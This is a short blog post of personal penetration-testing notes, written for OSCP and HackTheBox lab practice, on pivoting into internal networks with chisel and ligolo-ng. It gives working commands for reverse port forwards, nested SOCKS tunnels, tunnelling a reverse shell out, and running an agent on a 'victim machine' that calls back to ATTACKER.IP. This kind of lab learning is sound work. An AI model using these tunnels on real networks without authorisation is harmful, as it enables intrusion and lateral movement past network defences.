Skip to main content
Hashnodeholmesphere

Command Palette

Search for a command to run...

A shallow guide on Pivoting

Published
3 min read
A shallow guide on Pivoting
H
Hardeep Singh

These are my personal notes that I made during my OSCP prep and later while solving Offshore labs by HackTheBox. They are supposed to be in very layman terms and are written so I can understand without deep jargon what I need to do.

Chisel:
Situation: Reverse Pivot

When you want to check/ping some port on target machine's internal network:

# Your machine attacker.local
chisel server -p 8000 -reverse
# Client client.target, internal.target:port
chisel client attacker.local:8000 R:8001:internal.target:port
# ^ this will open a port 8001 on attacker.local and
# that will be basically copy of internal.target:port in layman terms

Situation: Local Pivot

When we want target machine to send any incoming traffic on one of it's newly opened ports to one of our ports. This can be used to tunnel a reverse shell from: somewhere inside the target network --> original target --> tunnel --> our attacker machine.

# Your machine attacker.local
chisel server -p 8000
# Client client.target
chisel client attacker.local:8000 9001:127.0.0.1:8001
 #                                               ^^^^ New port to be opened in attacker
 #                                     ^^^^^^^^^ localhost of client.target
 #                                ^^^^ New port to be opened on client.target

Can also be used to access specific service on either side of the network by replacing the values as shown in the picture above.

Situation: Reverse SOCKS

This is when you want to scale everything we did above, so you don't have to create a new tunnel every time you want to test another port. For example, if you were to check port 8080, and created a simple tunnel from the above methods, and now want to check port 80, you'll have to go back and create a new tunnel. This method nests chisel in chisel makes a client and server on both sides, over SOCKS proxy.
We then use proxychains to use connect to the tunnel and use whatever tool we want.

# On machine attacker.local
chisel server -p 8000 -reverse

# On client.target
chisel client attacker.local:8000 R:8001:127.0.0.1:1337
#                                                  ^^^^ Port on target that will connect to nested chisel 
#                                         ^^^^^^^^^ Localhost of client.target 
#                                    ^^^^ New port that you will use on attacker
chisel server -p 1337 --socks5
#                ^^^^ the same port that we opened in client command

# On machine attacker.local
chisel client 127.0.0.1:8001 socks
#             ^^^^^^^^^^^^^^ Standard listener to connect via socks to clisel server on target

Ligolo-ng

This is basically reverse SOCKS proxy, but 10 times better.

# Prepping attacker machine for ligolo:
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.2.0/24 dev ligolo
#                  ^^^^^^^^^^^^ subnet that you need to tunnel to yours.

# On Attacker machine:
sudo ./proxy -selfcert
# Note the port from the output of the above command - default  11601

# On Victim machine:
# Upload agent.exe to target
./agent.exe -connect ATTACKER.IP:<PORT FROM PROXY COMMAND> -ignore-cert

# Back on attacker machine, a session will open up, just select that session and type start.

All of these are heavily inspired by the video Ippsec made and released years ago, on HTB box called Reddish. You can find it here.

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

holmesphere

3 posts

“When you learn the art of learning, nothing is out of scope”

I make and break things, spend most of my time either reading novels or crawling terminals.